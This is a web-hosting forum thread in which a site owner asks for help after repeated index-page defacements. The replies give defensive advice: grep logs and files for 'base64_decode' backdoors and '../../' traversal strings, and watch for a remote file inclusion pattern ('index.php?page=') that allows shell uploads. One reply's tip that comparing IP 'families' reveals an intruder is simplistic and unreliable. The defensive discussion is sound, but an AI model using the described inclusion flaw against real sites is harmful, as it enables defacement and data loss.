Results 1 to 15 of 15
  1. #1

    Unhappy My Web has been hacked, help me identify the culprit

    hello

    my website has been hacked several times in the past 3 days. the hacker, thank god, doesnt seem to be the destructive type for the time being (touch on wood) but always deletes the main index file and instead posts a message of his own.

    How can I identify the IP (though Im guessing it must change every night possibly using a hacked remote PC for the little I know about hackers), so I can enter that IP into the IP deny manager. Goes without saying that Ive changed logins and passwords for long alphanumeric combinations. Ive also checked the logs but Im not sure what Im looking for. In anycase I cant find anything that stands out, certainly I ran a check to see if someone had deleted the index file but couldnt find nothing in the logs.

    is there any way to:

    1/ identify exactly the ip of the person who keeps hacking my WEB

    2/ know exactly how is making these changes and gaining access to my index file?

    Ive tried to ask for help to my hosting company but they havent been very helpful to be honest, so despite my inexperience dealing with hackers Im afraid is up to me, and hopefully your kind contribution, to close the door to this annoying hacker.

  2. #2
    Join Date
    Jan 2011
    Posts
    451
    Hello,

    It seems index replacement is happening here. Some tips to prevent this.

    >> Secure tmp
    >> Scan the entire server using Linux Malware Detect
    >> Disable shell access for all users.
    >> Install Mod Security.
    >> Install CSF
    >> Update all outdated softwares.
    >> Keep the ownership of directories to 755 and files to 644 ( Use suphp )
    " Your work is to discover your work and then with all your heart to give yourself to it. "

    That's the mark of a true professional !

  3. #3
    I think you should ask them specifics, such as who has been accessing my server, FTP activity, etc. And chances are is if they don't answer you then they typically aren't a good company.

  4. #4
    Join Date
    May 2011
    Location
    N/A
    Posts
    116

    *

    Quote Originally Posted by Wolf95 View Post
    I think you should ask them specifics, such as who has been accessing my server, FTP activity, etc. And chances are is if they don't answer you then they typically aren't a good company.
    How a hosting company will give you FTP activity report when there will be nearly 1500+ accounts under a server. Also it seems the person get SQL Injection so it is related to script security, chmod permission setup issues only.

  5. #5
    Join Date
    Jan 2011
    Posts
    660
    check the log files for a possible attackers ip address by looking at its activity ... then u can find the location by checking out the internic .. some countries also help cyber crime unit that might help u out ...

  6. #6
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    Sounds like a defacement.

    You do need to examine your log files - both the FTP logs and the access logs.

    In the FTP logs look for uploads during the time frame this happened. In the access logs look for GET or POSTs during this time with long query strings. They might include: base64_decode, or a long string of ../../

    See what file they're targeting by looking through the log files and see what you can do to block that activity. Typically a good .htaccess file will protect your website from these types of attacks.

    Also, scan all files for a string: base64_decode as this might be a backdoor that they'll use to re-infect your website.

  7. #7
    Join Date
    May 2009
    Location
    On a Speck!!!!!
    Posts
    216
    Check /var/log/secure for any possible break-in via ssh.
    Regards,
    Tom.

    Freelance System Administrator

  8. #8
    Join Date
    Mar 2009
    Location
    Israel
    Posts
    1,204
    Hi,
    first of all , there are several steps you should take.

    1. create a full backup of your account and download it to your local pc.
    2. scan the backup file with an antivirus on your PC , so you can make sure there are no known trojan files on the account.
    3. change all of your passwords including FTP / SQL / EMAIL
    4. upgrade your websites software ( if using joomla \ wordpess or any kind of free site software ).
    5. once you are satisfied with the upgrades and changes, create another full backup, and download it to your PC.
    6. contact your host , and ask for logs for your account , they should be able to gather logs related to your account with ease.
    7. go to www.whatismyip.org , look on how your IP looks like ( the first two numbers should be taken into consideration.

    compare your IP with the IP addresses on the log, if you see an ip from a different "family" , that might be your abuser.

    for example, if your ip is
    192.168.1.1
    and you can see in the logs
    10.200.1.1

    you can tell by that, a person from another ISP have logged into your account,
    send that IP back to your hosting provider, ask them to check about it and even block it on the firewall rules.

    these are only basic guidelines, there are many more things you can do in order to protect yourself.
    beast5.com © - Managed Hosting Solutions 2004 - 2016

  9. #9
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    PC based anti-virus programs are only going to find less than half of website based malscripts.

    And I believe the logs beatserv is referring to is the FTP logs and the logs for SSH, but you also need to review the access logs which won't have many, if any, of your local IP address.

  10. #10
    Join Date
    Mar 2009
    Location
    Israel
    Posts
    1,204

    Wink

    Quote Originally Posted by WeWatch View Post
    PC based anti-virus programs are only going to find less than half of website based malscripts.
    less is more.
    beast5.com © - Managed Hosting Solutions 2004 - 2016

  11. #11
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    Using a PC based anti-virus is better than nothing, but when cleaning a website, anything less than 100% is zero. If you don't get it all, it will just get re-infected again.

    If you don't find out how they got in the first time and close it, they will get back in and re-infect.

  12. #12
    Join Date
    Mar 2009
    Location
    Israel
    Posts
    1,204
    Quote Originally Posted by WeWatch View Post
    Using a PC based anti-virus is better than nothing, but when cleaning a website, anything less than 100% is zero. If you don't get it all, it will just get re-infected again.

    If you don't find out how they got in the first time and close it, they will get back in and re-infect.
    Yep, it's not the best thing , but its better then nothing.
    if the file is not *that* large, virustotal could be helpful in some cases.

    these are only basic guidelines of good practice, much more can be done in order to resolve such matters.

    Also, this only in case of an Infection which leads to a backdoor, In some cases the backdoor is the website code itself , hence the need of an upgrade to the latest versions for all modules / plugins related to the website, and close examination of the system logs, access logs and even error logs.

    but step one , - change all related passwords, once your account is breached, the main assumption is that your account is infected and all your passwords are compromised.

    it's always a good thing to be extra paranoid, if possible change even the username ( which will change paths) , and change the database names.
    beast5.com © - Managed Hosting Solutions 2004 - 2016

  13. #13
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    Quote Originally Posted by beastserv View Post
    it's always a good thing to be extra paranoid,
    We definitely agree here.

  14. #14
    Join Date
    Oct 2009
    Posts
    77
    Is there a chance any of your scripts could have an RFI vulnerability?

    IE: Pages that load like index.php?page=home - index.php?page=about

    The about link would then include "about.php" from a different directory, or something?

    This can very easily be exploited by hackers to upload a shell and deface your site.

  15. #15
    First of all many thanks for your kind contributions and apologies for the delayed update

    things didnt end well. The hacker did indeed destroy a huge DB I had of which, and I dont have any excuse, I didnt have a backup. As I see it I got what I deserved for my lack of caution. On top of that I had hired a programmer who coded the faulty DB and apparently from where the hacker got in, exploiting a vulnerability. I hired a new one, obviously, and redesigned the website, but I lost all my previous DB work and positioning. It was a tough blow, but one from where I hope I learnt something valuable for the future.

    The hosting wasnt particularly helpful, IMO, but not the one to blame in this situation. Apparently when the hacker gets through a DB or php or one of your scripts its extremely difficult for the hosting company to guess exactly which one, and I do get that now.

    Anyway MEA CULPA

    Quote Originally Posted by Zixt View Post
    Is there a chance any of your scripts could have an RFI vulnerability?

    IE: Pages that load like index.php?page=home - index.php?page=about

    The about link would then include "about.php" from a different directory, or something?

    This can very easily be exploited by hackers to upload a shell and deface your site.

    more or less this was the cause.

    thanks anyway guys and gals

Similar Threads

  1. My web server got hacked
    By jjk2 in forum Hosting Security and Technology
    Replies: 9
    Last Post: 06-03-2010, 10:01 AM
  2. Replies: 47
    Last Post: 04-28-2009, 02:27 AM
  3. Application Pool crashes identifying culprit
    By Number09 in forum Hosting Security and Technology
    Replies: 4
    Last Post: 09-15-2008, 11:34 AM
  4. Httpd using 100% CPU. How to find the culprit?
    By Igotit in forum Hosting Security and Technology
    Replies: 5
    Last Post: 02-09-2007, 08:26 AM
  5. Your First Hire - How to identify and employ talent for your web hosting business...
    By johnder in forum Running a Web Hosting Business Tutorials
    Replies: 3
    Last Post: 12-18-2004, 08:40 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •